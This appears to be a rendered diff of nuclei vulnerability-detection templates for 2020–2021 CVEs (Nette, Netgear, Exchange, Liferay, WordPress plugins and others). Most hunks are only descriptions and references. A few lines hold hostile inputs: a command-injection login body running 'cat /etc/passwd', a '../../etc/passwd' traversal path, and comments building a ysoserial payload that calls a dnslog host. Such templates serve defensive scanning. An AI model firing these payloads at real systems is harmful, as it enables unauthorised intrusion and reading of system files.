- https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E# - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E#
- https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md
tags: cve,cve2020,nette,rce tags: cve,cve2020,nette,rce
requests: requests:

View File

@ -17,7 +17,7 @@ requests:
Referer: "{{Hostname}}/module/login/login.html" Referer: "{{Hostname}}/module/login/login.html"
body: | body: |
op=login&username=;`cat /etc/passwd`&password= op=login&username=;`cat /etc/passwd`&password=
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -7,9 +7,9 @@ info:
description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability. description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability.
tags: cve,cve2020,netgear,auth-bypass tags: cve,cve2020,netgear,auth-bypass
reference: reference:
- https://wzt.ac.cn/2021/01/13/AC2400_vuln/ - https://wzt.ac.cn/2021/01/13/AC2400_vuln/
- https://www.zerodayinitiative.com/advisories/ZDI-20-1451/ - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866
requests: requests:
- raw: - raw:

View File

@ -5,9 +5,9 @@ info:
author: pikpikcu author: pikpikcu
severity: medium severity: medium
description: | description: |
SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
SVN, and GitLab credentials via the api/settings/values URI. SVN, and GitLab credentials via the api/settings/values URI.
NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it." NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
reference: https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/ reference: https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/
tags: cve,cve2020,sonarqube tags: cve,cve2020,sonarqube

View File

@ -5,8 +5,8 @@ info:
author: geeknik author: geeknik
description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database. description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database.
reference: reference:
- https://www.exploit-db.com/exploits/49314 - https://www.exploit-db.com/exploits/49314
- https://www.tenable.com/cve/CVE-2020-36112 - https://www.tenable.com/cve/CVE-2020-36112
severity: critical severity: critical
tags: cve,cve2020,sqli,cse tags: cve,cve2020,sqli,cse

View File

@ -7,8 +7,8 @@ info:
description: Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the QueryComponentRendererValue!Default.jspa endpoint. The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1. description: Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the QueryComponentRendererValue!Default.jspa endpoint. The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.
tags: cve,cve2020,jira,atlassian tags: cve,cve2020,jira,atlassian
reference: reference:
- https://twitter.com/ptswarm/status/1402644004781633540 - https://twitter.com/ptswarm/status/1402644004781633540
- https://nvd.nist.gov/vuln/detail/CVE-2020-36289 - https://nvd.nist.gov/vuln/detail/CVE-2020-36289
requests: requests:
- method: GET - method: GET

View File

@ -5,7 +5,7 @@ info:
author: gy741 author: gy741
description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php. description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.
reference: reference:
- https://cinzinga.com/CVE-2020-5307-5308/ - https://cinzinga.com/CVE-2020-5307-5308/
severity: critical severity: critical
tags: cve,cve2020,sqli tags: cve,cve2020,sqli

View File

@ -13,8 +13,8 @@ info:
- https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 - https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
- https://www.hpe.com/us/en/home.html # vendor homepage - https://www.hpe.com/us/en/home.html # vendor homepage
# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution. # This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability. # The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
requests: requests:
- method: GET - method: GET

View File

@ -7,8 +7,8 @@ info:
tags: cve,cve2020,rce,liferay tags: cve,cve2020,rce,liferay
description: Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS). description: Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS).
reference: reference:
- https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html
- https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271 - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271
requests: requests:
- payloads: - payloads:

View File

@ -7,10 +7,10 @@ info:
author: philippedelteil author: philippedelteil
tags: cve,cve2020,apache,dos tags: cve,cve2020,apache,dos
reference: reference:
- https://httpd.apache.org/security/vulnerabilities_24.html - https://httpd.apache.org/security/vulnerabilities_24.html
- https://bugs.chromium.org/p/project-zero/issues/detail?id=2030 - https://bugs.chromium.org/p/project-zero/issues/detail?id=2030
- https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=443369 - https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=443369
- https://nvd.nist.gov/vuln/detail/CVE-2020-9490 - https://nvd.nist.gov/vuln/detail/CVE-2020-9490
requests: requests:
- method: GET - method: GET

View File

@ -7,9 +7,9 @@ info:
description: | description: |
A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication. A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-20090 - https://nvd.nist.gov/vuln/detail/CVE-2021-20090
- https://www.tenable.com/security/research/tra-2021-13 - https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,lfi,buffalo,firmware,iot tags: cve,cve2021,lfi,buffalo,firmware,iot
requests: requests:

View File

@ -7,9 +7,9 @@ info:
description: | description: |
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-20091 - https://nvd.nist.gov/vuln/detail/CVE-2021-20091
- https://www.tenable.com/security/research/tra-2021-13 - https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,buffalo,firmware,iot tags: cve,cve2021,buffalo,firmware,iot
requests: requests:

View File

@ -7,9 +7,9 @@ info:
description: | description: |
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor. The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-20091 - https://nvd.nist.gov/vuln/detail/CVE-2021-20091
- https://www.tenable.com/security/research/tra-2021-13 - https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,buffalo,firmware,iot tags: cve,cve2021,buffalo,firmware,iot
requests: requests:

View File

@ -6,9 +6,9 @@ info:
severity: critical severity: critical
description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development. In Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 there is an unauthenticated remote code exploit. This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, one can block access to the Lucee Administrator. description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development. In Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 there is an unauthenticated remote code exploit. This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, one can block access to the Lucee Administrator.
reference: reference:
- https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r
- https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-21307 - https://nvd.nist.gov/vuln/detail/CVE-2021-21307
tags: cve,cve2021,rce,lucee,adobe tags: cve,cve2021,rce,lucee,adobe
requests: requests:

View File

@ -6,9 +6,9 @@ info:
severity: medium severity: medium
description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited. description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-22214 - https://nvd.nist.gov/vuln/detail/CVE-2021-22214
- https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
- https://docs.gitlab.com/ee/api/lint.html - https://docs.gitlab.com/ee/api/lint.html
tags: cve,cve2021,gitlab,ssrf,oob tags: cve,cve2021,gitlab,ssrf,oob
requests: requests:

View File

@ -6,8 +6,8 @@ info:
severity: medium severity: medium
description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard. description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard.
reference: reference:
- https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585 - https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585
- https://wordpress.org/plugins/jh-404-logger/ - https://wordpress.org/plugins/jh-404-logger/
tags: cve,cve2021,wordpress,wp-plugin,xss tags: cve,cve2021,wordpress,wp-plugin,xss
requests: requests:

View File

@ -7,8 +7,8 @@ info:
severity: medium severity: medium
tags: cve,cve2021,realteo,xss,wordpress tags: cve,cve2021,realteo,xss,wordpress
reference: reference:
- https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e
- https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt
requests: requests:
- method: GET - method: GET

View File

@ -7,9 +7,9 @@ info:
description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitise, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue. description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitise, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue.
tags: cve,cve2021,wordpress,wp-plugin,sqli tags: cve,cve2021,wordpress,wp-plugin,sqli
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-24285 - https://nvd.nist.gov/vuln/detail/CVE-2021-24285
- https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/ - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
- https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162 - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162
requests: requests:
- raw: - raw:

View File

@ -7,8 +7,8 @@ info:
severity: medium severity: medium
tags: cve,cve2021,mediumish,xss,wordpress tags: cve,cve2021,mediumish,xss,wordpress
reference: reference:
- https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e
- https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt
requests: requests:
- method: GET - method: GET

View File

@ -6,8 +6,8 @@ info:
severity: medium severity: medium
tags: cve,cve2021,wp-plugin,wordpress,xss tags: cve,cve2021,wp-plugin,wordpress,xss
reference: reference:
- https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/ - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/
- https://wordpress.org/plugins/marmoset-viewer/#developers - https://wordpress.org/plugins/marmoset-viewer/#developers
requests: requests:
- method: GET - method: GET

View File

@ -6,8 +6,8 @@ info:
severity: critical severity: critical
reference: https://paper.seebug.org/1476/ reference: https://paper.seebug.org/1476/
description: | description: |
Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data. Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data.
Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server. Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
tags: cve,cve2021,apache,rce tags: cve,cve2021,apache,rce
requests: requests:

View File

@ -10,9 +10,9 @@ info:
- https://lists.apache.org/thread.html/r3c1802eaf34aa78a61b4e8e044c214bc94accbd28a11f3a276586a31%40%3Cuser.ofbiz.apache.org%3E - https://lists.apache.org/thread.html/r3c1802eaf34aa78a61b4e8e044c214bc94accbd28a11f3a276586a31%40%3Cuser.ofbiz.apache.org%3E
- https://lists.apache.org/thread.html/r6e4579c4ebf7efeb462962e359501c6ca4045687f12212551df2d607@%3Cnotifications.ofbiz.apache.org%3E - https://lists.apache.org/thread.html/r6e4579c4ebf7efeb462962e359501c6ca4045687f12212551df2d607@%3Cnotifications.ofbiz.apache.org%3E
# Note:- This is detection template, To perform deserializes do as below # Note:- This is detection template, To perform deserializes do as below
# java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot
# `cat mad.ot | hex` and replace in <cus-obj> along with the url in std-String value # `cat mad.ot | hex` and replace in <cus-obj> along with the url in std-String value
requests: requests:
- raw: - raw:

View File

@ -7,8 +7,8 @@ info:
severity: medium severity: medium
tags: cve,cve2021,moodle,jitsi,xss tags: cve,cve2021,moodle,jitsi,xss
reference: reference:
- https://github.com/udima-university/moodle-mod_jitsi/issues/67 - https://github.com/udima-university/moodle-mod_jitsi/issues/67
- https://nvd.nist.gov/vuln/detail/CVE-2021-26812 - https://nvd.nist.gov/vuln/detail/CVE-2021-26812
requests: requests:
- method: GET - method: GET

View File

@ -5,13 +5,13 @@ info:
author: madrobot author: madrobot
severity: critical severity: critical
description: | description: |
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078. Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
tags: cve,cve2021,ssrf,rce,exchange,oob tags: cve,cve2021,ssrf,rce,exchange,oob
reference: reference:
- https://proxylogon.com/#timeline - https://proxylogon.com/#timeline
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
- https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
- https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09 - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
requests: requests:
- raw: - raw:

View File

@ -5,8 +5,8 @@ info:
author: idealphase author: idealphase
description: In versions 8.2.1 through 8.5.2 of Pega Infinity, the password reset functionality for local accounts can be used to bypass local authentication checks. description: In versions 8.2.1 through 8.5.2 of Pega Infinity, the password reset functionality for local accounts can be used to bypass local authentication checks.
reference: reference:
- https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md - https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-27651 - https://nvd.nist.gov/vuln/detail/CVE-2021-27651
severity: critical severity: critical
tags: cve,cve2021,pega,auth-bypass tags: cve,cve2021,pega,auth-bypass

View File

@ -7,7 +7,7 @@ info:
author: pdteam author: pdteam
severity: critical severity: critical
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-27850 - https://nvd.nist.gov/vuln/detail/CVE-2021-27850
tags: cve,cve2021,apache,tapestry tags: cve,cve2021,apache,tapestry
requests: requests:

View File

@ -7,10 +7,10 @@ info:
tags: cve,cve2021,apache,solr,ssrf tags: cve,cve2021,apache,solr,ssrf
description: The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2. description: The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2.
reference: reference:
- https://www.anquanke.com/post/id/238201 - https://www.anquanke.com/post/id/238201
- https://ubuntu.com/security/CVE-2021-27905 - https://ubuntu.com/security/CVE-2021-27905
- https://nvd.nist.gov/vuln/detail/CVE-2021-27905 - https://nvd.nist.gov/vuln/detail/CVE-2021-27905
- https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
requests: requests:
- raw: - raw:

View File

@ -7,8 +7,8 @@ info:
description: Ntopng is a passive network monitoring tool focused on flows and statistics that can be obtained from the traffic captured by the server. There is a authentication bypass vulnerability in ntopng <= 4.2 description: Ntopng is a passive network monitoring tool focused on flows and statistics that can be obtained from the traffic captured by the server. There is a authentication bypass vulnerability in ntopng <= 4.2
tags: ntopng,cve,cve2021 tags: ntopng,cve,cve2021
reference: reference:
- http://noahblog.360.cn/ntopng-multiple-vulnerabilities/ - http://noahblog.360.cn/ntopng-multiple-vulnerabilities/
- https://github.com/AndreaOm/docs/blob/c27d2db8dbedb35c9e69109898aaecd0f849186a/wikipoc/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/HongKe/HongKe%20ntopng%20%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2021-28073.md - https://github.com/AndreaOm/docs/blob/c27d2db8dbedb35c9e69109898aaecd0f849186a/wikipoc/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/HongKe/HongKe%20ntopng%20%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2021-28073.md
requests: requests:
- method: GET - method: GET

View File

@ -5,7 +5,7 @@ info:
author: gy741 author: gy741
severity: medium severity: medium
description: | description: |
Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file. Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.
reference: reference:
- https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2021-28149 - https://nvd.nist.gov/vuln/detail/CVE-2021-28149

View File

@ -6,8 +6,8 @@ info:
tags: hpe,cve,cve2021,bypass tags: hpe,cve,cve2021,bypass
description: A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager. description: A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager.
reference: reference:
- https://www.tenable.com/security/research/tra-2021-15 - https://www.tenable.com/security/research/tra-2021-15
- https://nvd.nist.gov/vuln/detail/CVE-2021-29203 - https://nvd.nist.gov/vuln/detail/CVE-2021-29203
requests: requests:
- raw: - raw:

View File

@ -7,8 +7,8 @@ info:
severity: medium severity: medium
tags: cve,cve2021,xss,ghost tags: cve,cve2021,xss,ghost
reference: reference:
- https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg
- https://nvd.nist.gov/vuln/detail/CVE-2021-29484 - https://nvd.nist.gov/vuln/detail/CVE-2021-29484
requests: requests:
- method: GET - method: GET

View File

@ -6,8 +6,8 @@ info:
severity: critical severity: critical
description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2. description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
reference: reference:
- https://www.ambionics.io/blog/laravel-debug-rce - https://www.ambionics.io/blog/laravel-debug-rce
- https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129 - https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129
tags: cve,cve2021,laravel,rce tags: cve,cve2021,laravel,rce
requests: requests:

View File

@ -5,8 +5,8 @@ info:
author: dhiyaneshDk author: dhiyaneshDk
severity: medium severity: medium
reference: reference:
- https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/ - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
tags: cve,cve2021,expressjs,lfi tags: cve,cve2021,expressjs,lfi
requests: requests:

View File

@ -4,8 +4,8 @@ info:
name: Ansi_up XSS name: Ansi_up XSS
description: The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0. description: The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0.
reference: reference:
- https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf - https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf
- https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27 - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
author: geeknik author: geeknik
severity: medium severity: medium

View File

@ -7,9 +7,9 @@ info:
description: | description: |
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206. Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.
reference: reference:
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473
- https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
- https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
